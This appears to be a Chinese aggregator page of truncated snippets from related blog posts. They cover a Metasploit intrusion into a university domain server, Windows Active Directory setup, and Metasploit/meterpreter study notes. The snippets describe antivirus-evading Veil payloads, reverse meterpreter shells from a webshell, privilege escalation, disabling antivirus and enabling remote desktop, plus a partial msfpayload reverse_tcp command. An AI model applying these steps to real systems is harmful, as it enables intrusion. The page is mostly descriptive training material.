Metasploit渗透某高校域服务器】的更多相关文章

本文作者:i 春秋签约作家——shuteer 前期准备:1. 使用Veil生成免杀PAYLOAD: 2. 有一个外网IP的服务器,安装好metasploit,方便操作. 一.SHELL反弹meterpreter 上传免杀的PAYLOAD到SHELL(有时候会碰到EXE文件上传不了,可以使用powershell的meterpreter模块“XX.bat格式”来实现),然后在菜刀或者WEBSHELL下面运行,反弹成功. 二.提权 反弹成功后第一步就是getuid看权限,然后尝试提权,有以下几种方法…
标签:SQL SERVER/MSSQL SERVER/数据库/DBA/域控制器 概述 因为很多高性能高可用方案都会在域环境中组建,所以了解创建域的一些知识对搭建那些高可用方案很有必要. 环境:windows 2008 r2 企业版 域服务器IP:192.168.2.10 PC机IP:192.168.2.12 DNS:192.168.2.10 目录 概述 安装域 添加角色 执行dcpromo.exe 加入域 创建域用户 总结 安装域 添加角色 使用添加角色的主要好处是该步骤会检查服务器的配置,需要…
注:本文由Colin撰写,版权所有!转载请注明原文地址,谢谢合作! 说明:前段时间公司两台域控出现了一些问题导致数据无法相互进行同步,DC之间也无法进行共享访问,网络用户无法通过计算机名映射的共享访问资源.几经折腾最后排除并解决了部分可能性的故障,但两台域控制器之间的用户与数据同步自己始终没能搞定.最终只有等到最初搭建域环境的同事回来,向他描述故障情况后,经过一番折腾最后我们才解决该故障.由此可见自己在这方面还有很多不足,以后还应该多多学习.另外,感觉在处理问题时,知识.工作经验的积累与胆大心细…
描述: 搭建并配置域服务器,先安装操作系统,配置网络,安装组件,配置域帐号 步骤: 1,打开Hyper-V Manager,参考[Hyper-V]使用操作系统模板创建新的虚拟机,先完成操作系统的安装,注意以下修改以下信息: 磁盘名称:dc.vhdx 磁盘存储位置:x:\VMs\DC 虚拟机名称:DC 使用现有的虚拟机磁盘:x:\VMs\DC\dc.vhdx 选择使用内网网卡:InternalVirtualNetwork 内存大小:512 MB 服务器域\名称:ALM\DC 服务器IP:192.1…
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想.   本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含…
最近在一个新的网络环境里建立windows域服务器,准备建立主.备两台域服务器.在一台新服务器上面安装了windows2012R2并配置了DC服务.域和林的级别设置为Windows2012R2级别.在做辅助域的时候使用的是一台旧服务器,安装的是windows2012.在配置此dc域服务的时候发现由于域和林的级别不兼容,所以无法加入.网上搜了一下,发现在windows server2008之后dc的域和林的级别可以降级了,只是需要使用powershell操作,没有图形界面. 为了防止忘记,特记录如…
Metasploit:如何在 Metasploit 中使用反弹 Shell https://xz.aliyun.com/t/2380 Metasploit:如何使用 msfvenom https://xz.aliyun.com/t/2381 萌新科普 手把手教你如何用MSF进行后渗透测试 https://www.anquanke.com/post/id/164525 Metasploit 学习笔记 https://blog.csdn.net/tan6600/article/details/468…
第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队&…
安装之前首先要确保硬盘可用量>60G,内存要在7G及以上,我是在Mac里装的虚拟机,分配了7G内存(我的电脑总共才8G),编译CIL内存占用到了98% 一.Server 2016新建域控服务器 首先要把当前电脑指定一个固定的IP,并给管理员账户设置一个强密码,说实话我的Windows没有更新到最新的安全更新() 1.打开 服务器管理器 选择 管理——添加角色和功能 2.下一步,我选择默认的 3.下一步,已然选择默认 4.下一步,勾选 Active Directory服务器,弹框询问直接点击添加功…
#region 根据当前登录域账号 获取AD用户姓名和所在OU目录 /// <summary> /// 根据当前登录域账号 获取AD用户姓名和所在OU目录 /// </summary> /// <param name="searchUser">要搜索的当前用户名</param> /// <param name="paths">out返回该用户所在OU目录</param> /// <para…
在 winserver 2012  单森林单域,多站点环境中,想把某一个站点AD 域服务器IP地址更改,要如何操作,才能保证客户端正常运行,不影响客户端的运行.有些朋友也经常提出类似问题. 想在不影响客户端正常运行的情况下修改域中域控制器的IP地址.根据我的搜索和研究,如果环境域中还有其他域控制器,直接在目标域控制器网卡的IPv4(TCP/IP)属性中修改IP地址即可. 在我的实验环境中,修改一台域控制器的IP地址后,在另外一台域控制器上使用nslookup工具查询,能得到正确的新IP地址. 通…
为什么要搭建域? 工作组的分散管理模式不适合大型的网络环境下工作,域模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和安全策略的计算机集合.域中集中存储用户账号的计算机就是域控器,域中用户账号,计算机账号和安全策略被存储在域控制器上一个名为Active Directory的数据库中. 域服务器的搭建(以windowsServer2008为例) 1.打开服务器管理 2.点击添加角色 3.点击服务器角色,勾选Active Directory 域服务器角色,根据提示添加相应组件 3.…
一.前言 1.1 AD 域服务 什么是目录(directory)呢? 日常生活中使用的电话薄内记录着亲朋好友的姓名.电话与地址等数据,它就是 telephone directory(电话目录):计算机中的文件系统(file system)内记录着文件的文件名.大小与日期等数据,它就是 file directory(文件目录). 如果这些目录内的数据能够由系统加以整理,用户就能够容易且迅速地查找到所需的数据,而 directory service(目录服务)提供的服务,就是要达到此目的.在现实生活…
Metasploit渗透测试实验报告…
原创博客,转载请注出处! 学习笔记 参考书籍<Metasploit渗透测试指南(修订版)> 经过多日学习,初步掌握metasploit基本参数和使用方法,现进行渗透测试实践 靶机IP:169.254.113.77 KALI IP:192.168.159.134 终端键入msfconsole进入环境后调用nmap插件对目标进行隐蔽TCP链接扫描 nmap -sT -A --script=smb-vuln-ms08-067 -P0 169.254.113.77 部分结果为: 由上面对靶机的扫描结果…
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果.常见的 有内存溢出,网站程序漏洞利用,配置错误exploit. payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器.payload 也可以是只 能在目标机器上执行有限命令的程序. shellcode 是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行…
渗透测试的流程 渗透测试是一种有目的性的,针对目标机构计算机系统安全的检测评估方法,渗透测试的主要目的是改善目标机构的安全性.渗透测试各个阶段的基本工作: 1.前期交互阶段 在这个阶段,渗透测试工程师要与客户进行充分的交流,以便客户对即将开展的渗透测试会对他的网络或者服务器产生的影响有足够的了解.进一步的确定渗透测试的范围,目标以及代表客户进行测试时的特殊需求,例如特殊的权限,关键系统的访问许可等.在这阶段,关键点如下: (a).渗透测试的范围:这一部分需要确定渗透测试的范围并预估计整个项目的工…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式. 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令. 连上vpn又在内网中使用psexec和bind_tcp的时候经常会出现这种情况,别担心结束了之后再来一次,喝杯茶就好了. 0x02 常用类型 reverse_tcp path…
七.强大的meterpreter  7.1再探metasploit的攻击载荷模块     7.1.1典型的攻击载荷模块     metasploit涵盖了各大主流操作系统和平台,其中绝大部分是远程漏洞利用所使用的攻击载荷模块,功能一般是开启远程shell,远程执行命令.     metasploit支持用户将自己的shellcode导入框架中,只需将payload替换成自己的shellcode代码,修改一下描述等基础信息即可.     7.1.2使用攻击载荷模块     search 搜索,查询…
继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)         Sql注入攻击:大致分为 普通注入和盲注         跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS         跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求.         会话认证管理缺陷:…
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器.下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~ 一.情报搜集     1.外围信息搜集       外围信息搜集又叫公开渠道信息搜集.搜索引擎,公共信息库,目标门户网站等等都是很好的入手点.metasploit有一类“辅助模块”,可以帮助你进行信息搜集的工作,并且还集成了nmap等神器.       1.1通过DNS和IP挖掘目标网站的信息            ①who…
渗透测试实验环境搭建 下载虚拟机镜像 5个虚拟机镜像,其中Linux攻击机我选择用最新的kali Linux镜像,其余的均使用本书配套的镜像. 网络环境配置 VMware虚拟网络编辑器配置: 将VMnet1和VMnet8分别设置IP为192.168.10.0/24和10.10.10.0/24. 虚拟机镜像配置 攻击机配置 攻击机为kali linux,网络适配器选择VMnet8(NAT模式),然后打开虚拟机. 确认攻击机的IP地址为10.10.10.128,若不是则手工将IP设置为此. 在终端中…
看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstation-win 下载vm版本kali linux,https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vm-amd64.7z metasploit是一个渗透测试工具,在kali linux中有不少网络安全测试工具,…
最近一个项目遇到问题,公司局域网中,在F域下有个服务器Fa,我们的项目就部署在Fa.项目里面有个功能,需要把生成的文件(.doc,.xls,.pdf)保存到O域的一台文件共享服务器Ob.在原有的网络环境下,F域是不能访问O域,反过来也是.经过协商,让网络管理员开通了Fa访问Ob其中一个文件夹的权限,并给我们新建一个账号密码去访问.用一般的保存文件到服务器固定路径的方法不行,提醒没有权限.到网上找解决方案,汇总如下: 1.引用博客园walkingp 的一篇文章,http://www.cnblogs…
1.渗透测试基础内容 https://blog.csdn.net/Fly_hps/article/details/79492646 2.Metasploit基础 https://blog.csdn.net/Fly_hps/article/details/79493487 3.情报收集 https://blog.csdn.net/Fly_hps/article/details/79497893 4.漏洞扫描 https://blog.csdn.net/Fly_hps/article/details…
后渗透攻击: 介绍常用的一些命令: 查看进程:ps 查看当前进程号:getpid 查看系统信息:sysinfo 查看目标机是否为虚拟机:run post/windows/gather/checkvm 查看完整网络设置:route 查看当前权限:getuid 自动提权:getsystem 关闭杀毒软件:run post/windows/manage/killav 启动远程桌面协议:run post/windows/manage/enable_rdp 列举当前登录的用户:run post/windo…
Metasploit是一个免费的.可下载的渗透测试框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击测试.它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具. 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了.仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞. 正是因为Metasploit团队一直都在努力开发各种攻击测试工具,并将它们贡献给所有Metasploit用户,软件厂商再也不能…
原先是有图片,因为图片是直接粘贴上来的,发布之后图片都看见了,然后都使用上传图片的方式才搞定,这也是博客园比较坑的地方: 也可以查看该链接含图片: http://www.cnblogs.com/allen0/articles/8202759.html 1.首先,打开“服务器管理器”,点击管理——“添加功能和角色”.   2 进入“添加角色和功能向导”,检查到静态IP地址(为172.16.4.100)已配置完成,管理员帐户使用的是强密码和最新的安全更新在实验中可以忽略,点击“下一步”. 3 我们在…
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me) 0x01 在kali中使用metasploit 在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录了.这一点比bt5要…